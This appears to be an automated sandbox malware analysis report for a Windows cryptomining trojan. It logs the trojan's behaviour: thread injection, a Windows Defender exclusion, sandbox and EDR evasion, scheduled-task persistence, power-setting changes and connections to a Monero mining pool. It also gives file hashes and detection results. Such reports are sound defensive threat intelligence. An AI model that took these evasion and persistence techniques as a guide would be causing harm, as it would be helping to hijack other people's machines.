                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                        Source: conhost.exe, 00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                        Windows Management Instrumentation
                        1
                        Windows Service
                        1
                        Windows Service
                        22
                        Masquerading
                        OS Credential Dumping221
                        Security Software Discovery
                        Remote Services1
                        Archive Collected Data
                        1
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Command and Scripting Interpreter
                        1
                        Scheduled Task/Job
                        311
                        Process Injection
                        1
                        Disable or Modify Tools
                        LSASS Memory1
                        Process Discovery
                        Remote Desktop ProtocolData from Removable Media1
                        Non-Standard Port
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job
                        11
                        DLL Side-Loading
                        1
                        Scheduled Task/Job
                        41
                        Virtualization/Sandbox Evasion
                        Security Account Manager41
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin SharesData from Network Shared Drive1
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        PowerShell
                        Login Hook1
                        Abuse Elevation Control Mechanism
                        311
                        Process Injection
                        NTDS1
                        Application Window Discovery
                        Distributed Component Object ModelInput Capture1
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                        DLL Side-Loading
                        1
                        Abuse Elevation Control Mechanism
                        LSA Secrets12
                        System Information Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                        Obfuscated Files or Information
                        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Software Packing
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                        DLL Side-Loading
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        File Deletion
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548723 Sample: ahlntQUj2t.exe Startdate: 04/11/2024 Architecture: WINDOWS Score: 100 46 xmr-eu1.nanopool.org 2->46 48 time.windows.com 2->48 50 2 other IPs or domains 2->50 54 Antivirus detection for dropped file 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 58 Multi AV Scanner detection for dropped file 2->58 62 13 other signatures 2->62 8 xjfgcnhmcvxy.exe 4 2->8         started        12 ahlntQUj2t.exe 1 2->12         started        14 cmd.exe 1 2->14         started        16 7 other processes 2->16 signatures3 60 DNS related to crypt mining pools 46->60 process4 file5 40 C:\Windows\Temp\tkfgvduf.tmp, PE32+ 8->40 dropped 42 C:\Program Filesbehaviorgraphoogle\Libs\WR64.sys, PE32+ 8->42 dropped 68 Suspicious powershell command line found 8->68 70 Writes to foreign memory regions 8->70 72 Modifies the context of a thread in another process (thread injection) 8->72 86 2 other signatures 8->86 18 conhost.exe 8->18         started        22 conhost.exe 8->22         started        44 C:\Program Files\xjfgcnhmcvxy.exe, PE32+ 12->44 dropped 74 Adds a directory exclusion to Windows Defender 12->74 76 Found direct / indirect Syscall (likely to bypass EDR) 12->76 24 powershell.exe 36 12->24         started        78 Uses powercfg.exe to modify the power settings 14->78 80 Modifies power options to not sleep / hibernate 14->80 26 conhost.exe 14->26         started        34 4 other processes 14->34 82 Uses schtasks.exe or at.exe to add and modify task schedules 16->82 84 Loading BitLocker PowerShell Module 16->84 28 conhost.exe 16->28         started        30 conhost.exe 16->30         started        32 conhost.exe 16->32         started        36 10 other processes 16->36 signatures6 process7 dnsIp8 52 xmr-eu1.nanopool.org 54.37.232.103, 10343, 49855 OVHFR France 18->52 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->64 66 Loading BitLocker PowerShell Module 24->66 38 conhost.exe 24->38         started        signatures9 process10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        ahlntQUj2t.exe50%ReversingLabsWin64.Trojan.Generic
                        ahlntQUj2t.exe100%AviraTR/Crypt.EPACK.Gen2
                        ahlntQUj2t.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Windows\Temp\tkfgvduf.tmp100%AviraHEUR/AGEN.1313087
                        C:\Program Files\xjfgcnhmcvxy.exe100%AviraTR/Crypt.EPACK.Gen2
                        C:\Windows\Temp\tkfgvduf.tmp100%Joe Sandbox ML
                        C:\Program Files\xjfgcnhmcvxy.exe100%Joe Sandbox ML
                        C:\Program Files\Google\Libs\WR64.sys5%ReversingLabs
                        C:\Program Files\xjfgcnhmcvxy.exe50%ReversingLabsWin64.Trojan.Generic
                        C:\Windows\Temp\tkfgvduf.tmp62%ReversingLabsWin64.Trojan.Miner
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://crl.cloudflare.com/origin_ca.crlXd0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        s-part-0017.t-0009.t-msedge.net
                        13.107.246.45
                        truefalse
                          high
                          xmr-eu1.nanopool.org
                          54.37.232.103
                          truetrue
                            unknown
                            time.windows.com
                            unknown
                            unknowntrue
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.1442724674.0000026CF7DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1565918785.000001EF3B1FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1468881092.000001EF2CB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1565918785.000001EF3B336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1669199935.0000027098B64000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000D.00000002.1468881092.000001EF2C78E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.000002708A9A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.1423008816.0000026CE7F58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://go.micropowershell.exe, 0000000D.00000002.1468881092.000001EF2C2F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://ocsp.cloudflare.com/origin_ca0conhost.exe, 00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000022.00000002.2616177696.000002B9B49D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.cloudflare.com/origin_ca.crlXdconhost.exe, 00000022.00000002.2616177696.000002B9B49D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.1423008816.0000026CE7F58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/powershell.exe, 00000015.00000002.1669199935.0000027098B64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1442724674.0000026CF7DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1565918785.000001EF3B1FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1468881092.000001EF2CB64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1565918785.000001EF3B336000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1669199935.0000027098B64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Licensepowershell.exe, 00000015.00000002.1669199935.0000027098B64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crl.cloudflare.com/origin_ca.crlconhost.exe, 00000022.00000002.2616177696.000002B9B49D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Iconpowershell.exe, 00000015.00000002.1669199935.0000027098B64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://oneget.orgXpowershell.exe, 0000000D.00000002.1468881092.000001EF2C78E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000007.00000002.1423008816.0000026CE9BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1423008816.0000026CE9BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.000002708A97F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.000002708A9A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crl.cloudflare.com/origin_ca.crl0conhost.exe, 00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ocsp.cloudflare.com/origin_caconhost.exe, 00000022.00000002.2615840139.000002B9B4441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aka.ms/pscore68powershell.exe, 00000007.00000002.1423008816.0000026CE7D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1468881092.000001EF2B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.0000027088B05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1423008816.0000026CE7D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1468881092.000001EF2B181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1542046596.0000027088B05000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.1542046596.0000027088D18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://oneget.orgpowershell.exe, 0000000D.00000002.1468881092.000001EF2C78E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          54.37.232.103
                                                                          xmr-eu1.nanopool.orgFrance
                                                                          16276OVHFRtrue
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1548723
                                                                          Start date and time:2024-11-04 19:38:09 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 53s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:38
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:ahlntQUj2t.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:75a1567b2fdb22e1e074aed9cd5e759013ea59bf7b1ef8d7f32c524f32b680c9.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.spyw.evad.mine.winEXE@53/24@2/1
                                                                          EGA Information:
                                                                          • Successful, ratio: 60%
                                                                          HCA Information:
                                                                          • Successful, ratio: 86%
                                                                          • Number of executed functions: 40
                                                                          • Number of non-executed functions: 71
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                          • Excluded IPs from analysis (whitelisted): 20.101.57.9
                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target powershell.exe, PID 7264 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 7988 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • VT rate limit hit for: ahlntQUj2t.exe
                                                                          TimeTypeDescription
                                                                          13:39:17API Interceptor83x Sleep call for process: powershell.exe modified
                                                                          13:39:51API Interceptor43806x Sleep call for process: conhost.exe modified
                                                                          13:39:51API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                          19:39:23Task SchedulerRun new task: GQFENPEL path: C:\Program Files\xjfgcnhmcvxy.exe
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          54.37.232.103file.exeGet hashmaliciousXmrigBrowse
                                                                            12Jh49DCAj.exeGet hashmaliciousXmrigBrowse
                                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                                Chrome.exeGet hashmaliciousXmrigBrowse
                                                                                  SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                                                                                    setup.exeGet hashmaliciousXmrigBrowse
                                                                                      SecuriteInfo.com.Win64.TrojanX-gen.22735.27744.exeGet hashmaliciousXmrigBrowse
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        xmr-eu1.nanopool.orgfile.exeGet hashmaliciousXmrigBrowse
                                                                                        • 163.172.154.142
                                                                                        HmA7s2gaa5.exeGet hashmaliciousXmrigBrowse
                                                                                        • 162.19.224.121
                                                                                        12Jh49DCAj.exeGet hashmaliciousXmrigBrowse
                                                                                        • 51.15.65.182
                                                                                        Ky4J8k89A7.exeGet hashmaliciousStealc, Vidar, XmrigBrowse
                                                                                        • 51.15.58.224
                                                                                        boooba.exeGet hashmaliciousXmrigBrowse
                                                                                        • 51.15.58.224
                                                                                        2HUgVjrn3O.exeGet hashmaliciousXmrigBrowse
                                                                                        • 51.15.58.224
                                                                                        SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                                                        • 141.94.23.83
                                                                                        Yf4yviDxwF.exeGet hashmaliciousXmrigBrowse
                                                                                        • 54.37.232.103
                                                                                        file.exeGet hashmaliciousXmrigBrowse
                                                                                        • 54.37.137.114
                                                                                        Q3Vq6yp33F.exeGet hashmaliciousXmrigBrowse
                                                                                        • 51.15.65.182
                                                                                        s-part-0017.t-0009.t-msedge.netfast_copy.exeGet hashmaliciousStealcBrowse
                                                                                        • 13.107.246.45
                                                                                        _Retail_Benefits_and_Commission_2024.svgGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        https://wordtohtml.net/user_files/244701_d6db22759e351980/414618_dailyfeedback.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                        • 13.107.246.45
                                                                                        https://wordtohtml.net/user_files/244701_d6db22759e351980/414618_dailyfeedback.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                        • 13.107.246.45
                                                                                        https://ecommpg.klikbca.com/BCAPGW/Payment/Link?plid=1096JGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        https://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        https://reictert.world/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.107.246.45
                                                                                        https://payment-process.com/?u=76846-accc8c612b0407eda85ec03dda9ebb278d6584944964622cbd551e9422a2a8c6Get hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        REG _ CARBOLINE STATEMENT OCTOBER - 2024 (2).emlGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        https://www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp%2F%37%38%32%6A%6E%73%6A%73%6A%73%38%6D%64%6E%6E%73%6A%69%32%32%33%32%32%30%68%73%64%6E%68%64%6A%73%6A%73%6D%6D%6D%73%6A%73%6D%6E%64%64%2E%66%69%6E%64%6C%6E%67%73%69%6E%63%2E%63%6F%6D%2FGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.246.45
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        OVHFRhttps://t.co/WUjzOGRMNxGet hashmaliciousUnknownBrowse
                                                                                        • 51.38.120.206
                                                                                        RnOAeiRWds.exeGet hashmaliciousAsyncRATBrowse
                                                                                        • 51.222.21.24
                                                                                        Fattura88674084.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 51.91.79.17
                                                                                        file.exeGet hashmaliciousXmrigBrowse
                                                                                        • 51.195.43.17
                                                                                        sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                        • 54.39.196.186
                                                                                        g49e742700.exeGet hashmaliciousEmotetBrowse
                                                                                        • 178.33.167.120
                                                                                        Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                                        • 94.23.172.32
                                                                                        Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                                        • 139.99.170.35
                                                                                        Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                        • 158.69.205.247
                                                                                        Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                                        • 54.36.209.254
                                                                                        No context
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Program Files\Google\Libs\WR64.sysfile.exeGet hashmaliciousXmrigBrowse
                                                                                          ICBM.exeGet hashmaliciousXmrigBrowse
                                                                                            ICBM.exeGet hashmaliciousXmrigBrowse
                                                                                              ICBM.exeGet hashmaliciousXmrigBrowse
                                                                                                ICBM.exeGet hashmaliciousXmrigBrowse
                                                                                                  HmA7s2gaa5.exeGet hashmaliciousXmrigBrowse
                                                                                                    SaxP2rle4l.exeGet hashmaliciousXmrigBrowse
                                                                                                      6YbG0llASL.exeGet hashmaliciousXmrigBrowse
                                                                                                        2Y2u9r3RUs.exeGet hashmaliciousXmrigBrowse
                                                                                                          xeqHTJ1ihs.exeGet hashmaliciousXmrigBrowse
                                                                                                            Process:C:\Program Files\xjfgcnhmcvxy.exe
                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):14544
                                                                                                            Entropy (8bit):6.2660301556221185
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                                                                            • Filename: HmA7s2gaa5.exe, Detection: malicious, Browse
                                                                                                            • Filename: SaxP2rle4l.exe, Detection: malicious, Browse
                                                                                                            • Filename: 6YbG0llASL.exe, Detection: malicious, Browse
                                                                                                            • Filename: 2Y2u9r3RUs.exe, Detection: malicious, Browse
                                                                                                            • Filename: xeqHTJ1ihs.exe, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\cmd.exe
                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114
                                                                                                            Entropy (8bit):2.9406513824097402
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:QrjaPUFvEMlWlK3Fflov5NlJLlT4DzltAn:Q/aevEMlWlKovp1ls9un
                                                                                                            MD5:A339F4ACCAD69128A4CCBBE88504F7E3
                                                                                                            SHA1:ABB3A54A1BD37D20D74ECC5D46294A071393BC45
                                                                                                            SHA-256:FAF5D6C4C6BFBCE741A08E85CE79CF09BA99056549886DEDE5CA5A56E34C0019
                                                                                                            SHA-512:60AE5F7B86ED7044DF906E589C2AD2ABDB95E8C3089BC4102878E19C0BEF4CC7C1889B79C6F8147C3E2EBFBFB0721EEC1B760C82CE72A33D2BBDDEDEAF81F807
                                                                                                            Malicious:false
                                                                                                            Preview:..N.a.m.e. . . . . . .V.i.d.e.o.P.r.o.c.e.s.s.o.r. . .....1.Y.L.2.1.G.O.1. . .O.K.M.4.V. . . . . . . . . . . .....
                                                                                                            Process:C:\Users\user\Desktop\ahlntQUj2t.exe
                                                                                                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2137088
                                                                                                            Entropy (8bit):7.959331419868799
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:49152:Z3LiNvWKaxZxeaOaUS15emjARtJGXVhwqbPcIt:ZbidWxeLEyyyGFhwqIY
                                                                                                            MD5:934E9A3E294FA41C527FBD6DC867DDEC
                                                                                                            SHA1:57EDAB4C313A7B3BF083A0C3364195B0491E00BA
                                                                                                            SHA-256:75A1567B2FDB22E1E074AED9CD5E759013EA59BF7B1EF8D7F32C524F32B680C9
                                                                                                            SHA-512:3CF0955F0C17EDB9F2DAB98700F1A3D3D98E4A96DA7A967EEFC6D6151E37AD160BF6CF5549B6000EC3EA588B84E828C122005B8E3857E0297A763069746AF4CC
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
